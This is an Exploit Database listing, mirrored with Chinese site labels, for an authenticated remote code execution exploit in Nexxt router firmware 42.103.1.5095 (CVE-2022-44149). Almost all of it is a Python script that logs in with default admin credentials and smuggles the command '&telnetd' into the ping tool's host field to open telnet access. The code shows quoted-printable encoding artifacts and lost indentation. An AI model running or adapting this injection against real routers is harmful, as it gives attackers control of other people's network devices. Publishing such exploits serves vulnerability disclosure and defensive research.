Nexxt Router Firmware 42.103.1.5095 – Remote Code Execution (RCE) (Authenticated)

• Exploit Database
• 13 阅读

• 作者： Yerodin Richards
  日期： 2023-04-01
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/51195/

• # Exploit Title: Nexxt Router Firmware 42.103.1.5095 - Remote Code Executio=
  n (RCE) (Authenticated)
  # Date: 19/10/2022
  # Exploit Author: Yerodin Richards
  # Vendor Homepage: https://www.nexxtsolutions.com/
  # Version: 42.103.1.5095
  # Tested on: ARN02304U8
  # CVE : CVE-2022-44149
  
  import requests
  import base64
  
  router_host =3D "http://192.168.1.1"
  username =3D "admin"
  password =3D "admin"
  
  
  def main():
  send_payload("&telnetd")
  print("connect to router using: `telnet "+router_host.split("//")[1]+ "=
  ` using known credentials")
  pass
  
  def gen_header(u, p):
  return base64.b64encode(f"{u}:{p}".encode("ascii")).decode("ascii")
  
  def get_cookie(header):
  url =3D router_host+"/login"
  params =3D {"arg":header, "_n":1}
  resp=3Drequests.get(url, params=3Dparams)
   =20
  def send_payload(payload):
  url =3D router_host+"/goform/sysTools"
  headers =3D {"Authorization": "Basic {}".format(gen_header(username, pa=
  ssword))}
  params =3D {"tool":"0", "pingCount":"4", "host": payload, "sumbit": "OK=
  "}
  requests.post(url, headers=3Dheaders, data=3Dparams)
  
  
  if __name__ =3D=3D '__main__':
  main()